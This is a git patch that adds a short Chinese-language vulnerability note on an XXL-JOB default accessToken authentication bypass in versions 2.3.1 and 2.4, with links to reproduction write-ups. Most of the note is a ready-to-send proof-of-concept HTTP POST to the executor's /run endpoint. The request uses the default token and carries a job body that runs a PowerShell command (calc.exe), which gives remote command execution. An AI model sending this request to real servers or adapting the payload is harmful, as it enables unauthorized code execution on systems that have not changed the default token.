From 2da05a9567ed544dab5c9296b4f2fcbc56637c13 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 3 Nov 2023 15:02:22 +0800
Subject: [PATCH] =?UTF-8?q?Create=20XXL-JOB=E9=BB=98=E8=AE=A4accessToken?=
 =?UTF-8?q?=E8=BA=AB=E4=BB=BD=E7=BB=95=E8=BF=87=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 XXL-JOB默认accessToken身份绕过漏洞.md | 48 +++++++++++++++++++++++++++
 1 file changed, 48 insertions(+)
 create mode 100644 XXL-JOB默认accessToken身份绕过漏洞.md

diff --git a/XXL-JOB默认accessToken身份绕过漏洞.md b/XXL-JOB默认accessToken身份绕过漏洞.md
new file mode 100644
index 0000000..e8362a7
--- /dev/null
+++ b/XXL-JOB默认accessToken身份绕过漏洞.md
@@ -0,0 +1,48 @@
+## XXL-JOB默认accessToken身份绕过漏洞
+
+
+## 漏洞影响
+```
+2.3.1和2.4
+```
+
+## poc
+```
+POST /run HTTP/1.1
+Host: 127.0.0.1:9999
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+XXL-JOB-ACCESS-TOKEN: default_token
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Content-Length: 365
+
+{
+  "jobId": 1,
+  "executorHandler": "demoJobHandler",
+  "executorParams": "demoJobHandler",
+  "executorBlockStrategy": "SERIAL_EXECUTION",
+  "executorTimeout": 0,
+  "logId": 1,
+  "logDateTime": 1586629003729,
+  "glueType": "GLUE_POWERSHELL",
+  "glueSource": "calc.exe",
+  "glueUpdatetime": 1586699003758,
+  "broadcastIndex": 0,
+  "broadcastTotal": 0
+}
+```
+
+## 漏洞复现
+```
+https://mp.weixin.qq.com/s/9vcIRCbKyisFq3vPXmiMkQ
+https://www.cnblogs.com/chm0d/p/17805168.html
+```
+